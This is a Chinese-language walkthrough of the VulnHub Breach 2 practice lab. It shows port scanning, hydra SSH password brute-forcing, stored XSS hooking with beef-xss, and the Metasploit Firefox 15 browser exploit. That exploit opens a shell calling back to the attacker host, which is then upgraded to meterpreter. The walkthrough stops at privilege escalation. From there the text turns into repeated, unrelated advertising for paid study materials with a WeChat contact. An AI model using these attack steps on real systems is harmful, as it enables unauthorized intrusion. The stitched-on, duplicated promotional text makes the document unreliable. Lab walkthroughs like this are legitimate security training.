VulnHub靶场笔记 - Breach 2，字节跳动学习笔记

对开放端口进行探测

sudo nmap -sC -sV -O -p111,39055,65535 -oN nmap.txt --append-out 192.168.110.151

针对111端口进行探测

sudo nmap -sSUC -p111 -oN nmap.txt --append-out 192.168.110.151

SSH登录尝试

ssh root@192.168.110.151 -p65535

成功，登录界面如下

根据ssh登录界面给出的信息，可以推测出用户有root和peter，更新user.list

同时，推测密码可能是in the source或者inthesource，也有可能是blog或者vacation，更新pass.list

然后，我们使用hydra进行爆破

hydra -L user.list -P pass.list ssh://192.168.110.151:65535

成功，得到了peter用户的密码

我们尝试使用爆破得到的用户名密码进行ssh登录

ssh peter@192.168.110.151 -p65535

但是登录失败，可能是加载了其他的程序，阻碍了登录

我们可以使用 ‘-vvv’ 参数，将ssh链接过程中的详细信息打印出来（已保存至ssh.log文件）

ssh peter@192.168.110.151 -p65535 -vvv

靶机信息再探测

UDP全端口扫描

sudo nmap -sU -p- --min-rate 1000 -oN nmap.txt --append-out 192.168.110.151

针对结果中的UDP端口进行扫描

sudo nmap -sUCV -p 111,45513 -oN nmap.txt --append-out 192.168.110.151

再次进行TCP端口扫描

sudo nmap -sS -p- --min-rate 1000 -T4 192.168.110.151

出现了一个之前没有80端口，推测可能是经过SSH登录之后，后台加载的其他程序使得80端口开启

页面探测

访问：http://192.168.110.151/，内容如下

BEEF提示我们或许可以使用 beef-xss 这个xss工具破解此题

They really shouldn’t have taken my stapler away… 这句话值得注意，可能在后面会用到

查看页面源代码，没有有用的信息

对网站使用dirb工具进行扫描

dirb http://192.168.110.151/

发现一个 blog 目录和一个 images 目录

访问：http://192.168.110.151/blog/，内容如下，是一个博客页面

访问：http://192.168.110.151/images/，没有权限

2-GetShell

XSS利用

可以在blog页面发现一个用户注册入口

为测试能否实现XSS，按照如下信息注册一个用户

Username:
Password: 123
E-Mail: 123

注册成功，然后点击 Member(http://192.168.110.151/blog/members.html)，查看已注册的用户

发现成功弹窗，说明可以尝试进行XSS注入

根据此前的提示，我们尝试使用beef-xss工具（密码igfix），我们将红框中的数据作为用户名在blog中注册一个用户，把127.0.0.1替换为Kali的地址

用户注册信息如下，注册前需要清理浏览器缓存，以重新进入注册页面

Username:
Password: 123
E-Mail: 123

然后，在浏览器中访问：http://192.168.110.128:3000/ui/panel，登录之后可以看到Kali和靶机都已上线

Firefox低版本漏洞利用

可以看到靶机的浏览器版本为Firefox 15，版本很低（Kali的是Firefox 115），尝试利用相关漏洞

使用exploit-db查找相关漏洞

searchsploit firefox 15

发现与msf相关的利用，比如第一个（可利用程度较高，而且是利用msf）

那么，直接使用msf

msfconsole

进入msf

msf6 > search firefox 15
msf6 > use 12

选择与上述对应的利用，此处是12

使用options命令查看选项完成配置，此处需要先设置URIPATH

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > options
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath igfix

同时，完成Payload options中的LHOST设置，以利用默认payload

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lhost 192.168.110.128

然后开始运行

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > run

可以看到服务已经启动，而且给出一个URL

我们将红框中的URL在靶机浏览器中设置重定向访问，具体操作如下

点击执行，稍等后可以在msf中看到会话已经建立

使用如下命令，查看并进入会话

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > sessions
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > sessions -i 1

尝试执行命令，发现已经成功拿到shell

shell持久化

显然，通过 firefox_proto_crmfrequest 获得的shell非常不稳定，因此我们需要借助msf中的其他工具来获得一个稳定的shell

首先，查找 post shell to meterpreter

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > search post shell to meterpreter

我们选择利用第5个，并查看需要完成的配置

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > use 5
msf6 post(multi/manage/shell_to_meterpreter) > options

我们先将LHOST设置为Kali的IP地址

msf6 post(multi/manage/shell_to_meterpreter) > set lhost 192.168.110.128
msf6 post(multi/manage/shell_to_meterpreter) > run

然后，我们再次在靶机浏览器中设置重定向访问URL：http://192.168.110.128:8080/igfix，以建立session

需要根据新建立的 session Id 来设置 shell_to_meterpreter 的 options 中 SESSION 的值，不断查看session是否建立，一旦建立session马上输入run命令运行shell_to_meterpreter

开始运行shell_to_meterpreter后，继续使用sessions命令查看，直至看到类型为meterpreter的session建立

然后执行如下命令获取shell

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 5

执行shell命令以获取靶机用户的shell环境

meterpreter > shell

此时可以看到当前用户

whoami

至此，我们成功得到了一个持久的shell

3-milton用户提权

基础提权与信息查看

基础提权

which python
python -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm

查看具有/bin/bash和home目录的用户，查看当前用户可以以sudo运行的程序

cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep ‘home|sh’

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

添加VX：vip204888 （备注网络安全获取）**
[外链图片转存中…(img-ebP1VTnw-1712725551508)]

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-F9m9wfPn-1712725551509)]